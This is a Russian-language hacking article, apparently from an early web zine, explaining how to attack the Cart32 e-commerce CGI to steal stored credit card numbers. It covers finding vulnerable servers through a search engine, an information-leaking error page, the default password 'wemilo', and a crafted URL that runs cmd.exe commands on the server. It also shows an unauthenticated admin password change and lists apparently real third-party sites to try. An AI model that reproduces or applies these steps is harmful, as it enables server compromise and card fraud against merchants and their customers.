Cart32 (http://www.cart32.com/) - Shopping Cart System for Windows 95 & NT представляет из себя “движок” для Он-лайн магазинов. А где магазины, там, как известно, кредитные карточки:).

Насколько мне известно, последняя версия данного продукта – Cart31 v 3.6, является также уязвимой, как и ее предшественники.

Для начала ты должен научиться находить этот скрипт, по дефолту он находится в директории CGI-BIN или SCRIPTS на сервере. Если ты внимательно читал мои прошлые статьи, то прекрасно знаешь как искать незащищенные сервера через поисковые системы. Итак, идем на АльтаВисту (http://www.altavista.com/) и в окошке поиска вводим: “/scripts/cart32.exe/”, “/cgi-bin/cart32.exe/” и начинаем разгребать ссылки:).

1) Если в системе разрешен запрос “ERROR”, то пробуем: wwwhost.org/cgi-bin/cart32.exe/error. Скрипт может вывести море информации по установленной на серваке системе, листинг директории /cgi-bin/cart32 и директории, куда установлена программа (стандартно - C:Program FilesMWAIncCart32).

Пример:
INIFile = C:Program FilesMWAIncCart32cart32.ini
CGI Information
CGI_ServerSoftware = Microsoft-IIS/4.0
CGI_ServerName = http://www.host.org/
CGI_RequestMethod = GET
CGI_Referer =
GI_RemoteHost = 313.373.3.333
CGI_RemoteAddr = 313.373.3.334
CGI_UserAgent = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
CGI_ContentLength =0
CGI_ScriptName = /cgi-bin/cart32.exe
CGI_ServerURL =
CGI_GatewayInterface =CGI/1.1
CGI_ServerProtocol =HTTP/1.1
CGI_ServerPort = 80
CGI_ContentType =
CGI_QueryString =
CGI_PathInfo = /error
CGI_Cookie =

2) Если повезет, то админ сервака проинсталлирует все в один каталог, например в cgi-bin, и, прочитав лог об ошибке (см. предыдущий пункт), мы увидим, что в директории /cgi-bin/ находятся файлы blahblah-[число]. В этих файлах находятся долгожданные кредитные карточки ( в одном файле по одной креде).

Примечание : В старых версиях вся информация о кредах хранилась в файле blahblah-orders.txt

3) Стандартным паролем является "wemilo". C данным паролем, вы можете пойти на нижеприведенную ссылку, которая покажет вам список всех юзеров и их хешированные пароли:

http://www.victim.com/cgi-bin/cart32.ex … clientlist

Воспользовавшись этой уязвимостью, вы можете просмотреть список всех пользователей и их хешированные пароли. Хотя они и хешированные, их все равно можно применить, введя нижеприведенный URL:

http://www.host.org/cgi-bin/c32web.exe? TabName=Cart32%2B&Action= Save+Cart32%2B+Tab&SaveTab= Cart32%2B&Client=foobar&ClientPassword= e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin= &AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave =Run+External+Program&UseCMDLine=Yes&CMDLine= cmd.exe+%2Fc+dir+%3E+c%3A%5Czlob.txt

После успешного выполнения этой операции, вся инфа будет запишется в файл "zlob.txt" на диске C:.

Более того, пойдя на данный URL:

4) http://www.host.org/scripts/c32web.exe/ ChangeAdminPassword

можно сменить пароль администратора, не зная старого :).

Это конечно же не все уязвимости в этой проге, особо любопытные перцы могут скачать (ftp://ftp.cart32.com/c32full.exe - 3,82 MB) сие чудо и самим попробовать найти уязвимости.

Чтобы вам не было скучно – даю пару УРЛцев:

http://qwe.ds/cgi-bin/cart32.exe/error
http://www.tcsn.net/cgi-bin/cart32.exe/error
http://www.backstreet-publish.com/cgi-b … 32/aaa.log
http://www.backstreet-publish.com/cgi-b … .exe/error
http://www.dakotamade.com/CGI-BIN/CART32.EXE/cart32cli

Я не отвечаю за то что ссыли до сих пор работают!